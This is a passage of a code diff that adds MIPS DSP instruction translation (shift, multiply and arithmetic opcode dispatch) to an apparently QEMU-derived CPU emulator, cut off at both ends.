v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDWC: + check_dsp(ctx); + gen_helper_addwc(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MODSUB: + check_dsp(ctx); + gen_helper_modsub(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_RADDU_W_QB: + check_dsp(ctx); + gen_helper_raddu_w_qb(tcg_ctx, *cpu_gpr[ret], v1_t); + break; + } + break; + case OPC_CMPU_EQ_QB_DSP: + switch (op2) { + case OPC_PRECR_QB_PH: + check_dspr2(ctx); + gen_helper_precr_qb_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_QB_PH: + check_dsp(ctx); + gen_helper_precrq_qb_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECR_SRA_PH_W: + check_dspr2(ctx); + { + TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); + gen_helper_precr_sra_ph_w(tcg_ctx, *cpu_gpr[ret], sa_t, v1_t, + *cpu_gpr[ret]); + tcg_temp_free_i32(tcg_ctx, sa_t); + break; + } + case OPC_PRECR_SRA_R_PH_W: + check_dspr2(ctx); + { + TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, v2); + gen_helper_precr_sra_r_ph_w(tcg_ctx, *cpu_gpr[ret], sa_t, v1_t, + *cpu_gpr[ret]); + tcg_temp_free_i32(tcg_ctx, sa_t); + break; + } + case OPC_PRECRQ_PH_W: + check_dsp(ctx); + gen_helper_precrq_ph_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_RS_PH_W: + check_dsp(ctx); + gen_helper_precrq_rs_ph_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PRECRQU_S_QB_PH: + check_dsp(ctx); + gen_helper_precrqu_s_qb_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_ABSQ_S_QH_DSP: + switch (op2) { + case OPC_PRECEQ_L_PWL: + check_dsp(ctx); + tcg_gen_andi_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 0xFFFFFFFF00000000ull); + break; + case OPC_PRECEQ_L_PWR: + check_dsp(ctx); + tcg_gen_shli_tl(tcg_ctx, *cpu_gpr[ret], v2_t, 32); + break; + case OPC_PRECEQ_PW_QHL: + check_dsp(ctx); + gen_helper_preceq_pw_qhl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQ_PW_QHR: + check_dsp(ctx); + gen_helper_preceq_pw_qhr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQ_PW_QHLA: + check_dsp(ctx); + gen_helper_preceq_pw_qhla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQ_PW_QHRA: + check_dsp(ctx); + gen_helper_preceq_pw_qhra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBL: + check_dsp(ctx); + gen_helper_precequ_qh_obl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBR: + check_dsp(ctx); + gen_helper_precequ_qh_obr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBLA: + check_dsp(ctx); + gen_helper_precequ_qh_obla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEQU_QH_OBRA: + check_dsp(ctx); + gen_helper_precequ_qh_obra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBL: + check_dsp(ctx); + gen_helper_preceu_qh_obl(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBR: + check_dsp(ctx); + gen_helper_preceu_qh_obr(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBLA: + check_dsp(ctx); + gen_helper_preceu_qh_obla(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_PRECEU_QH_OBRA: + check_dsp(ctx); + gen_helper_preceu_qh_obra(tcg_ctx, *cpu_gpr[ret], v2_t); + break; + case OPC_ABSQ_S_OB: + check_dspr2(ctx); + gen_helper_absq_s_ob(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_PW: + check_dsp(ctx); + gen_helper_absq_s_pw(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + case OPC_ABSQ_S_QH: + check_dsp(ctx); + gen_helper_absq_s_qh(tcg_ctx, *cpu_gpr[ret], v2_t, tcg_ctx->cpu_env); + break; + } + break; + case OPC_ADDU_OB_DSP: + switch (op2) { + case OPC_RADDU_L_OB: + check_dsp(ctx); + gen_helper_raddu_l_ob(tcg_ctx, *cpu_gpr[ret], v1_t); + break; + case OPC_SUBQ_PW: + check_dsp(ctx); + gen_helper_subq_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_PW: + check_dsp(ctx); + gen_helper_subq_s_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_QH: + check_dsp(ctx); + gen_helper_subq_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBQ_S_QH: + check_dsp(ctx); + gen_helper_subq_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_OB: + check_dsp(ctx); + gen_helper_subu_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_OB: + check_dsp(ctx); + gen_helper_subu_s_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_QH: + check_dspr2(ctx); + gen_helper_subu_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBU_S_QH: + check_dspr2(ctx); + gen_helper_subu_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SUBUH_OB: + check_dspr2(ctx); + gen_helper_subuh_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SUBUH_R_OB: + check_dspr2(ctx); + gen_helper_subuh_r_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDQ_PW: + check_dsp(ctx); + gen_helper_addq_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_PW: + check_dsp(ctx); + gen_helper_addq_s_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_QH: + check_dsp(ctx); + gen_helper_addq_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDQ_S_QH: + check_dsp(ctx); + gen_helper_addq_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_OB: + check_dsp(ctx); + gen_helper_addu_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_OB: + check_dsp(ctx); + gen_helper_addu_s_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_QH: + check_dspr2(ctx); + gen_helper_addu_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDU_S_QH: + check_dspr2(ctx); + gen_helper_addu_s_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_ADDUH_OB: + check_dspr2(ctx); + gen_helper_adduh_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_ADDUH_R_OB: + check_dspr2(ctx); + gen_helper_adduh_r_ob(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + } + break; + case OPC_CMPU_EQ_OB_DSP: + switch (op2) { + case OPC_PRECR_OB_QH: + check_dspr2(ctx); + gen_helper_precr_ob_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECR_SRA_QH_PW: + check_dspr2(ctx); + { + TCGv_i32 ret_t = tcg_const_i32(tcg_ctx, ret); + gen_helper_precr_sra_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, ret_t); + tcg_temp_free_i32(tcg_ctx, ret_t); + break; + } + case OPC_PRECR_SRA_R_QH_PW: + check_dspr2(ctx); + { + TCGv_i32 sa_v = tcg_const_i32(tcg_ctx, ret); + gen_helper_precr_sra_r_qh_pw(tcg_ctx, v2_t, v1_t, v2_t, sa_v); + tcg_temp_free_i32(tcg_ctx, sa_v); + break; + } + case OPC_PRECRQ_OB_QH: + check_dsp(ctx); + gen_helper_precrq_ob_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_PW_L: + check_dsp(ctx); + gen_helper_precrq_pw_l(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_QH_PW: + check_dsp(ctx); + gen_helper_precrq_qh_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_PRECRQ_RS_QH_PW: + check_dsp(ctx); + gen_helper_precrq_rs_qh_pw(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_PRECRQU_S_OB_QH: + check_dsp(ctx); + gen_helper_precrqu_s_ob_qh(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_shift(DisasContext *ctx, uint32_t opc, + int ret, int v1, int v2) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + uint32_t op2; + const char *opn = "mipsdsp shift"; + TCGv t0; + TCGv v1_t; + TCGv v2_t; + + if (ret == 0) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + tcg_gen_movi_tl(tcg_ctx, t0, v1); + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (opc) { + case OPC_SHLL_QB_DSP: + { + op2 = MASK_SHLL_QB(ctx->opcode); + switch (op2) { + case OPC_SHLL_QB: + check_dsp(ctx); + gen_helper_shll_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_QB: + check_dsp(ctx); + gen_helper_shll_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_PH: + check_dsp(ctx); + gen_helper_shll_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_PH: + check_dsp(ctx); + gen_helper_shll_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_PH: + check_dsp(ctx); + gen_helper_shll_s_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_PH: + check_dsp(ctx); + gen_helper_shll_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_W: + check_dsp(ctx); + gen_helper_shll_s_w(tcg_ctx, *cpu_gpr[ret], t0, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_W: + check_dsp(ctx); + gen_helper_shll_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_SHRL_QB: + check_dsp(ctx); + gen_helper_shrl_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRLV_QB: + check_dsp(ctx); + gen_helper_shrl_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRL_PH: + check_dspr2(ctx); + gen_helper_shrl_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRLV_PH: + check_dspr2(ctx); + gen_helper_shrl_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRA_QB: + check_dspr2(ctx); + gen_helper_shra_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRA_R_QB: + check_dspr2(ctx); + gen_helper_shra_r_qb(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRAV_QB: + check_dspr2(ctx); + gen_helper_shra_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRAV_R_QB: + check_dspr2(ctx); + gen_helper_shra_r_qb(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRA_PH: + check_dsp(ctx); + gen_helper_shra_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRA_R_PH: + check_dsp(ctx); + gen_helper_shra_r_ph(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRAV_PH: + check_dsp(ctx); + gen_helper_shra_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRAV_R_PH: + check_dsp(ctx); + gen_helper_shra_r_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + case OPC_SHRA_R_W: + check_dsp(ctx); + gen_helper_shra_r_w(tcg_ctx, *cpu_gpr[ret], t0, v2_t); + break; + case OPC_SHRAV_R_W: + check_dsp(ctx); + gen_helper_shra_r_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t); + break; + default: /* Invalid */ + MIPS_INVAL("MASK SHLL.QB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + } +#ifdef TARGET_MIPS64 + case OPC_SHLL_OB_DSP: + op2 = MASK_SHLL_OB(ctx->opcode); + switch (op2) { + case OPC_SHLL_PW: + check_dsp(ctx); + gen_helper_shll_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_PW: + check_dsp(ctx); + gen_helper_shll_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_PW: + check_dsp(ctx); + gen_helper_shll_s_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_PW: + check_dsp(ctx); + gen_helper_shll_s_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_OB: + check_dsp(ctx); + gen_helper_shll_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_OB: + check_dsp(ctx); + gen_helper_shll_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_QH: + check_dsp(ctx); + gen_helper_shll_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_QH: + check_dsp(ctx); + gen_helper_shll_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHLL_S_QH: + check_dsp(ctx); + gen_helper_shll_s_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_SHLLV_S_QH: + check_dsp(ctx); + gen_helper_shll_s_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t, tcg_ctx->cpu_env); + break; + case OPC_SHRA_OB: + check_dspr2(ctx); + gen_helper_shra_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_OB: + check_dspr2(ctx); + gen_helper_shra_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_R_OB: + check_dspr2(ctx); + gen_helper_shra_r_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_R_OB: + check_dspr2(ctx); + gen_helper_shra_r_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_PW: + check_dsp(ctx); + gen_helper_shra_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_PW: + check_dsp(ctx); + gen_helper_shra_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_R_PW: + check_dsp(ctx); + gen_helper_shra_r_pw(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_R_PW: + check_dsp(ctx); + gen_helper_shra_r_pw(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_QH: + check_dsp(ctx); + gen_helper_shra_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_QH: + check_dsp(ctx); + gen_helper_shra_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRA_R_QH: + check_dsp(ctx); + gen_helper_shra_r_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRAV_R_QH: + check_dsp(ctx); + gen_helper_shra_r_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRL_OB: + check_dsp(ctx); + gen_helper_shrl_ob(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRLV_OB: + check_dsp(ctx); + gen_helper_shrl_ob(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + case OPC_SHRL_QH: + check_dspr2(ctx); + gen_helper_shrl_qh(tcg_ctx, *cpu_gpr[ret], v2_t, t0); + break; + case OPC_SHRLV_QH: + check_dspr2(ctx); + gen_helper_shrl_qh(tcg_ctx, *cpu_gpr[ret], v2_t, v1_t); + break; + default: /* Invalid */ + MIPS_INVAL("MASK SHLL.OB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#endif + } + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, v1_t); + tcg_temp_free(tcg_ctx, v2_t); + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s", opn); +} + +static void gen_mipsdsp_multiply(DisasContext *ctx, uint32_t op1, uint32_t op2, + int ret, int v1, int v2, int check_ret) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + const char *opn = "mipsdsp multiply"; + TCGv_i32 t0; + TCGv v1_t; + TCGv v2_t; + + if ((ret == 0) && (check_ret == 1)) { + /* Treat as NOP. */ + MIPS_DEBUG("NOP"); + return; + } + + t0 = tcg_temp_new_i32(tcg_ctx); + v1_t = tcg_temp_new(tcg_ctx); + v2_t = tcg_temp_new(tcg_ctx); + + tcg_gen_movi_i32(tcg_ctx, t0, ret); + gen_load_gpr(ctx, v1_t, v1); + gen_load_gpr(ctx, v2_t, v2); + + switch (op1) { + /* OPC_MULT_G_2E, OPC_ADDUH_QB_DSP, OPC_MUL_PH_DSP have + * the same mask and op1. */ + case OPC_MULT_G_2E: + check_dspr2(ctx); + switch (op2) { + case OPC_MUL_PH: + gen_helper_mul_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MUL_S_PH: + gen_helper_mul_s_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_S_W: + gen_helper_mulq_s_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_RS_W: + gen_helper_mulq_rs_w(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; + case OPC_DPA_W_PH_DSP: + switch (op2) { + case OPC_DPAU_H_QBL: + check_dsp(ctx); + gen_helper_dpau_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAU_H_QBR: + check_dsp(ctx); + gen_helper_dpau_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_QBL: + check_dsp(ctx); + gen_helper_dpsu_h_qbl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_QBR: + check_dsp(ctx); + gen_helper_dpsu_h_qbr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPA_W_PH: + check_dspr2(ctx); + gen_helper_dpa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAX_W_PH: + check_dspr2(ctx); + gen_helper_dpax_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_S_W_PH: + check_dsp(ctx); + gen_helper_dpaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQX_S_W_PH: + check_dspr2(ctx); + gen_helper_dpaqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQX_SA_W_PH: + check_dspr2(ctx); + gen_helper_dpaqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPS_W_PH: + check_dspr2(ctx); + gen_helper_dps_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSX_W_PH: + check_dspr2(ctx); + gen_helper_dpsx_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_S_W_PH: + check_dsp(ctx); + gen_helper_dpsq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQX_S_W_PH: + check_dspr2(ctx); + gen_helper_dpsqx_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQX_SA_W_PH: + check_dspr2(ctx); + gen_helper_dpsqx_sa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULSAQ_S_W_PH: + check_dsp(ctx); + gen_helper_mulsaq_s_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_SA_L_W: + check_dsp(ctx); + gen_helper_dpaq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_SA_L_W: + check_dsp(ctx); + gen_helper_dpsq_sa_l_w(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_PHL: + check_dsp(ctx); + gen_helper_maq_s_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_PHR: + check_dsp(ctx); + gen_helper_maq_s_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_PHL: + check_dsp(ctx); + gen_helper_maq_sa_w_phl(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_PHR: + check_dsp(ctx); + gen_helper_maq_sa_w_phr(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULSA_W_PH: + check_dspr2(ctx); + gen_helper_mulsa_w_ph(tcg_ctx, t0, v1_t, v2_t, tcg_ctx->cpu_env); + break; + } + break; +#ifdef TARGET_MIPS64 + case OPC_DPAQ_W_QH_DSP: + { + int ac = ret & 0x03; + tcg_gen_movi_i32(tcg_ctx, t0, ac); + + switch (op2) { + case OPC_DMADD: + check_dsp(ctx); + gen_helper_dmadd(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DMADDU: + check_dsp(ctx); + gen_helper_dmaddu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DMSUB: + check_dsp(ctx); + gen_helper_dmsub(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DMSUBU: + check_dsp(ctx); + gen_helper_dmsubu(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPA_W_QH: + check_dspr2(ctx); + gen_helper_dpa_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_S_W_QH: + check_dsp(ctx); + gen_helper_dpaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAQ_SA_L_PW: + check_dsp(ctx); + gen_helper_dpaq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAU_H_OBL: + check_dsp(ctx); + gen_helper_dpau_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPAU_H_OBR: + check_dsp(ctx); + gen_helper_dpau_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPS_W_QH: + check_dspr2(ctx); + gen_helper_dps_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_S_W_QH: + check_dsp(ctx); + gen_helper_dpsq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSQ_SA_L_PW: + check_dsp(ctx); + gen_helper_dpsq_sa_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_OBL: + check_dsp(ctx); + gen_helper_dpsu_h_obl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_DPSU_H_OBR: + check_dsp(ctx); + gen_helper_dpsu_h_obr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_L_PWL: + check_dsp(ctx); + gen_helper_maq_s_l_pwl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_L_PWR: + check_dsp(ctx); + gen_helper_maq_s_l_pwr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHLL: + check_dsp(ctx); + gen_helper_maq_s_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHLL: + check_dsp(ctx); + gen_helper_maq_sa_w_qhll(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHLR: + check_dsp(ctx); + gen_helper_maq_s_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHLR: + check_dsp(ctx); + gen_helper_maq_sa_w_qhlr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHRL: + check_dsp(ctx); + gen_helper_maq_s_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHRL: + check_dsp(ctx); + gen_helper_maq_sa_w_qhrl(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_S_W_QHRR: + check_dsp(ctx); + gen_helper_maq_s_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MAQ_SA_W_QHRR: + check_dsp(ctx); + gen_helper_maq_sa_w_qhrr(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MULSAQ_S_L_PW: + check_dsp(ctx); + gen_helper_mulsaq_s_l_pw(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + case OPC_MULSAQ_S_W_QH: + check_dsp(ctx); + gen_helper_mulsaq_s_w_qh(tcg_ctx, v1_t, v2_t, t0, tcg_ctx->cpu_env); + break; + } + } + break; +#endif + case OPC_ADDU_QB_DSP: + switch (op2) { + case OPC_MULEU_S_PH_QBL: + check_dsp(ctx); + gen_helper_muleu_s_ph_qbl(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEU_S_PH_QBR: + check_dsp(ctx); + gen_helper_muleu_s_ph_qbr(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULQ_RS_PH: + check_dsp(ctx); + gen_helper_mulq_rs_ph(tcg_ctx, *cpu_gpr[ret], v1_t, v2_t, tcg_ctx->cpu_env); + break; + case OPC_MULEQ_S_W_PHL: + 